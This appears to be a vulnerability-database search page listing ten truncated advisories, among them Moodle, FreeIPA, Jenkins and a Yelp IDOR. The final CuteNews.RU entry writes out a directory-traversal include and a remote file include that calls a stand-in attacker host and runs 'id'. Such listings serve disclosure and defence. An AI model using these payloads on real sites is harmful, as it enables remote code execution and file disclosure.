10 matches found
EUVD-2007-4402
Malware in sbrugna...
EUVD-2006-4072
Malware in sbrugna...
CVE-2024-45691
A flaw was found in Moodle. When restricting access to a lesson activity with a password, certain passwords could be bypassed or less secure due to a loose comparison in the password-checking logic. This issue only affected passwords set to "magic hash" values...
Rocky Linux 9 : ipa (RLSA-2024:3754)
The remote Rocky Linux 9 host has packages installed that are affected by multiple vulnerabilities as referenced in the RLSA-2024:3754 advisory. freeipa: delegation rules allow a proxy service to impersonate any user to access another target service CVE-2024-2698 freeipa: user can obtain a hash o...
eZ Publish Legacy Patch EZSA-2018-001 for Several vulnerabilities
This security advisory fixes 4 separate vulnerabilities in eZ Publish Legacy, and we recommend that you install it as soon as possible if you are using Legacy by itself or via the LegacyBridge. First, it increases the randomness, and thus the security, of the pseudo-random bytes used to generate ...
GHSA-R75M-26CQ-MJXC Serverpod improved security for stored password hashes
Description: Improved security for stored password hashes. Serverpod now uses the OWASP-recommended Argon2Id password hash algorithm to store password hashes for the email authentication module. Starting from Serverpod 1.2.6 all users that either create an account or authenticate with th...
PT-2022-27481 · Jenkins · Jenkins Script Security Plugin +1
Name of the Vulnerable Software and Affected Versions: Jenkins Script Security Plugin versions 1189.vb_a_b_7c8fd5fde and earlier. Description: The issue arises from the storage of whole-script approvals as the SHA-1 hash of the script, which no longer meets security standards for producing a...
Yelp: IDOR in locid parameter allowing to view others accounts Profile Locations
The application transmits on many occasions the locid parameter via URL, which means that this parameter may be being logged in plain text in the Apache server access.log, if not in others also. The fact that this happens makes this parameter vulnerable not only to be read from this log file, but...
yourownbux40-sql.txt
Yourownbux v4.0 Blind...
CuteNews.RU v026 - bugs
Network security team nst.e-nex.com Title: CuteNews.RU v026 - bugs Bug found by: тёмыч Date: 25.10.2004 If magic_quotes_gpc = off: include showarchives.php?template=../../../../../../../../file00 If .htaccess is not working: include /inc/shows.inc.php?cutepath=http://ATTACKER&nst=id beforehand...